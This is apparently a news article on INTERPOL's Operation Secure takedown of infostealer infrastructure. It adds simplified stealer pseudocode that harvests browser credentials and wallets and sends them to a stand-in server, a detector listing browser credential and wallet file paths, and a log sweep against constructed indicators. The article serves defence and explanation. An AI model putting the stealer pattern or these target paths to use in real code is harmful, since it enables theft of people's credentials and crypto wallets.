Interpol Dismantles 20,000 Malicious IPs and Domains Tied to 69 Malware Variants
INTERPOL’s Operation Secure has seen the takedown of more than 20,000 malicious IP addresses and domains associated with infostealer malware.
Law enforcement across 26 countries collaborated to dismantle cybercriminal infrastructure, marking a significant step forward in the fight against digital threats in the Asia-Pacific region.
Operation Secure: Regional Collaboration Meets Targeted Takedowns
From January to April 2025, law enforcement agencies across Asia and the Pacific conducted extensive operations to locate servers, map criminal networks, and execute targeted takedowns.
INTERPOL coordinated closely with leading cybersecurity firms Group-IB, Kaspersky, and Trend Micro, leveraging their advanced threat intelligence to produce Cyber Activity Reports.
These reports provided critical, actionable intelligence to cyber teams, leading to the disruption of 79% of identified suspicious IPs.
Operation Secure was executed under the banner of the Asia and South Pacific Joint Operations Against Cybercrime (ASPJOC) Project.
The participating countries included Brunei, Cambodia, Fiji, Hong Kong (China), India, Indonesia, Japan, Kazakhstan, Kiribati, Korea (Rep of), Laos, Macau (China), Malaysia, Maldives, Nauru, Nepal, Papua New Guinea, Philippines, Samoa, Singapore, Solomon Islands, Sri Lanka, Thailand, Timor-Leste, Tonga, and Vanuatu.
Among the major outcomes:
- 41 servers seized
- Over 100 GB of data confiscated
- 32 arrests made globally
- Over 216,000 victims and potential victims notified
Spotlight on Infostealer Malware: Technical Mechanisms and Impact
Infostealer malware has become a primary tool for cybercriminals to gain unauthorized access to victims’ networks.
These malicious programs extract sensitive information from infected devices (often referred to as ‘bots’ or compromised endpoints), including browser credentials, passwords, cookies, credit card details, and cryptocurrency wallet data.
Although the source code of commercial stealers is rarely published, the following simplified pseudocode shows the pattern they share: locate local data stores, harvest them, and exfiltrate the result to a server the operator controls. The two modules are placeholders, not real packages.

```python
import browser_stealer_module    # placeholder: locates browser profiles and reads their credential stores
import data_exfiltration_module  # placeholder: ships the harvested data to the operator's server

# Collect browser data (credentials, cookies, etc.)
browsers = browser_stealer_module.find_browsers()
stolen_data = browser_stealer_module.collect_data(browsers)

# Collect cryptocurrency wallet information
wallet_data = browser_stealer_module.find_wallets()
stolen_data.update(wallet_data)

# Send collected data to the command-and-control server
data_exfiltration_module.send_to_server(stolen_data, "https://malicious-server.example.com")
```
Note: This is illustrative only; real infostealers are far more complex and obfuscated.
Once harvested, logs from infostealers are sold on underground marketplaces, enabling secondary attacks such as ransomware, data breaches, and business email compromise (BEC) schemes.
These logs serve as the initial foothold for more destructive payloads.
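The harvesting step described above has a defensive mirror: a process that is not a browser or wallet application reading browser credential databases, cookie stores or wallet files. The following detection logic is an added example written for this article, not code from INTERPOL or the participating vendors. It runs over constructed file-access events shaped loosely like EDR or Sysmon file-read telemetry; the event fields, the path patterns and the allow-list of legitimate reader processes are assumptions a defender would tune to their own fleet.

```python
"""Flag non-browser processes that read browser credential stores or wallet files.

Added example for this article (not from INTERPOL or the reporting vendors).
Event fields, path patterns and the allow-list below are assumptions.
"""
from dataclasses import dataclass
import fnmatch

# Files an infostealer typically harvests; paths are normalised to forward slashes.
SENSITIVE_PATTERNS = {
    "browser_credentials": [
        "*/Google/Chrome/User Data/*/Login Data",
        "*/Microsoft/Edge/User Data/*/Login Data",
        "*/Mozilla/Firefox/Profiles/*/logins.json",
    ],
    "browser_cookies": [
        "*/Google/Chrome/User Data/*/Network/Cookies",
        "*/Mozilla/Firefox/Profiles/*/cookies.sqlite",
    ],
    "crypto_wallet": [
        "*/Exodus/exodus.wallet/*",
        "*/Electrum/wallets/*",
        "*/wallet.dat",
    ],
}

# Processes expected to read their own stores (assumed allow-list); anything else is suspicious.
LEGITIMATE_READERS = {"chrome.exe", "msedge.exe", "firefox.exe", "exodus.exe", "electrum.exe"}


@dataclass(frozen=True)
class FileEvent:
    host: str
    process: str
    path: str


def classify(path):
    """Return the sensitive-store category a path belongs to, or None."""
    norm = path.replace("\\", "/")
    for category, patterns in SENSITIVE_PATTERNS.items():
        if any(fnmatch.fnmatch(norm, pattern) for pattern in patterns):
            return category
    return None


def suspicious_reads(events):
    """(host, process, category) for every sensitive-store read by a non-allow-listed process."""
    hits = []
    for event in events:
        category = classify(event.path)
        if category and event.process.lower() not in LEGITIMATE_READERS:
            hits.append((event.host, event.process, category))
    return hits


def triage(events):
    """Group hits per (host, process); one process touching several categories is the strongest signal."""
    grouped = {}
    for host, process, category in suspicious_reads(events):
        grouped.setdefault((host, process), set()).add(category)
    return {key: sorted(categories) for key, categories in grouped.items()}


# Constructed sample telemetry: one benign browser read, one stealer-like process, one wallet read.
SAMPLE_EVENTS = [
    FileEvent("HOST-01", "chrome.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    FileEvent("HOST-01", "svchost_update.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    FileEvent("HOST-01", "svchost_update.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    FileEvent("HOST-01", "explorer.exe", r"C:\Users\alice\Documents\budget.xlsx"),
    FileEvent("HOST-02", "python.exe", r"C:\Users\bob\AppData\Roaming\Bitcoin\wallet.dat"),
]

if __name__ == "__main__":
    for (host, process), categories in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {process} read {', '.join(categories)}")
```

A hit on two or more categories from the same process within a short window is the pattern worth paging on; a single wallet.dat read by a backup agent is the kind of benign case the allow-list exists to absorb, so expect to extend it.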
Major Arrests and Technical Triumphs
Authorities in Vietnam, Sri Lanka, and Nauru conducted multiple raids as part of Operation Secure, while Hong Kong police focused on analysing the intelligence INTERPOL supplied:
- Vietnam: 18 suspects arrested, including a group leader with VND 300 million (USD 11,500) in cash, SIM cards, and business registration documents. This pointed to a sophisticated scheme for opening and selling corporate accounts.
- Sri Lanka and Nauru: 14 suspects arrested, 12 in Sri Lanka and two in Nauru; 40 victims identified.
- Hong Kong: Police analyzed over 1,700 pieces of intelligence provided by INTERPOL, identifying 117 command-and-control (C2) servers across 89 ISPs. These servers acted as hubs for launching phishing, fraud, and social media scams.
Command-and-control servers are the backbone of cybercriminal infrastructure, enabling attackers to control infected devices and orchestrate large-scale campaigns remotely.
The takedown of these servers severely disrupts the operational capacity of cybercriminal groups.
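The intelligence that drove the Hong Kong analysis and the 79% disruption rate is, at its core, a list of domains and IP addresses. For a defender the immediate use of such a list is to sweep DNS and proxy logs for hosts that contacted any of them, which is also how victims get identified for notification. The following matcher is an added example written for this article, not code from INTERPOL, Group-IB, Kaspersky or Trend Micro; the indicator list (using reserved TEST-NET ranges and .example names), the log formats and the log lines are all constructed.

```python
"""Sweep DNS and proxy logs for contact with a set of takedown indicators.

Added example for this article, not code from INTERPOL or the vendors it names.
Indicators, log line formats and sample lines are constructed.
"""
import ipaddress
import re

# Constructed indicator list: domain names and IP addresses/CIDR blocks.
INDICATORS = {
    "domains": ["stealer-panel.example", "cdn.log-drop.example"],
    "ips": ["203.0.113.0/24", "198.51.100.77"],
}

# Assumed log shapes: "<ts> <src_ip> query <qname>" and "<ts> <src_ip> CONNECT <dst>:<port>".
DNS_LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) query (?P<qname>\S+)$")
PROXY_LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) CONNECT (?P<dst>\S+):(?P<port>\d+)$")


class IndicatorSet:
    def __init__(self, domains, ips):
        self.domains = {self._norm(d) for d in domains}
        self.networks = [ipaddress.ip_network(i, strict=False) for i in ips]

    @staticmethod
    def _norm(name):
        # Lower-case and strip the trailing dot resolvers append to fully qualified names.
        return name.lower().rstrip(".")

    def match_domain(self, qname):
        """Return the indicator matching qname or any parent domain of it (never a bare TLD)."""
        labels = self._norm(qname).split(".")
        for i in range(len(labels) - 1):
            candidate = ".".join(labels[i:])
            if candidate in self.domains:
                return candidate
        return None

    def match_ip(self, value):
        """Return the indicator network containing value, or None if value is not an IP or not listed."""
        try:
            addr = ipaddress.ip_address(value)
        except ValueError:
            return None
        for net in self.networks:
            if addr in net:
                return str(net)
        return None


def scan(lines, indicators):
    """(src, source, observed, indicator) for every log line that touched an indicator."""
    hits = []
    for line in lines:
        m = DNS_LINE.match(line)
        if m:
            matched = indicators.match_domain(m["qname"])
            if matched:
                hits.append((m["src"], "dns", m["qname"], matched))
            continue
        m = PROXY_LINE.match(line)
        if m:
            dst = m["dst"]
            matched = indicators.match_ip(dst) or indicators.match_domain(dst)
            if matched:
                hits.append((m["src"], "proxy", dst, matched))
    return hits


def affected_hosts(hits):
    """Distinct internal source addresses that need notification and follow-up."""
    return sorted({hit[0] for hit in hits})


# Constructed sample log lines mixing benign traffic with indicator contacts.
SAMPLE_LOG = [
    "2025-03-02T10:14:07Z 10.0.5.21 query cdn.log-drop.example.",
    "2025-03-02T10:14:08Z 10.0.5.21 CONNECT 203.0.113.45:443",
    "2025-03-02T10:15:00Z 10.0.5.30 query www.example.com",
    "2025-03-02T10:16:12Z 10.0.5.44 CONNECT api.stealer-panel.example:8080",
    "2025-03-02T10:17:00Z 10.0.5.30 CONNECT 198.51.100.77:443",
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG, IndicatorSet(**INDICATORS))
    for src, source, observed, matched in found:
        print(f"{src} via {source}: {observed} -> {matched}")
    print("affected hosts:", affected_hosts(found))
```

Parent-domain matching matters because stealer panels rotate subdomains under a stable registered domain; matching only exact names would miss them. Sweep the full retention window, not just recent logs: an infected host may have contacted a C2 weeks before the indicator reached you.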
The Broader Cybersecurity Context
The success of Operation Secure highlights several key points for the cybersecurity community:
- Collaboration Works: Public-private partnerships and international law enforcement coordination are highly effective in disrupting cybercrime networks.
- Intelligence Sharing is Critical: Cyber Activity Reports and real-time threat intelligence allow for rapid, targeted responses.
- Infostealer Malware is a Gateway: The initial foothold provided by infostealers enables a cascade of secondary attacks, underscoring the need for early detection and mitigation.
INTERPOL’s Operation Secure represents a significant milestone in the fight against global cybercrime.
By dismantling over 20,000 malicious IPs and domains linked to at least 69 malware variants, law enforcement has sent a strong message: coordinated action and intelligence sharing can and will save thousands from the devastating consequences of infostealer-driven cyberattacks.
As Neal Jetton, INTERPOL’s Director of Cybercrime, stated:
“Operation Secure has once again shown the power of intelligence sharing in disrupting malicious infrastructure and preventing large-scale harm to both individuals and businesses.”
With cyber threats continuing to increase in scale and sophistication, the success of Operation Secure provides a blueprint for future international cybercrime responses.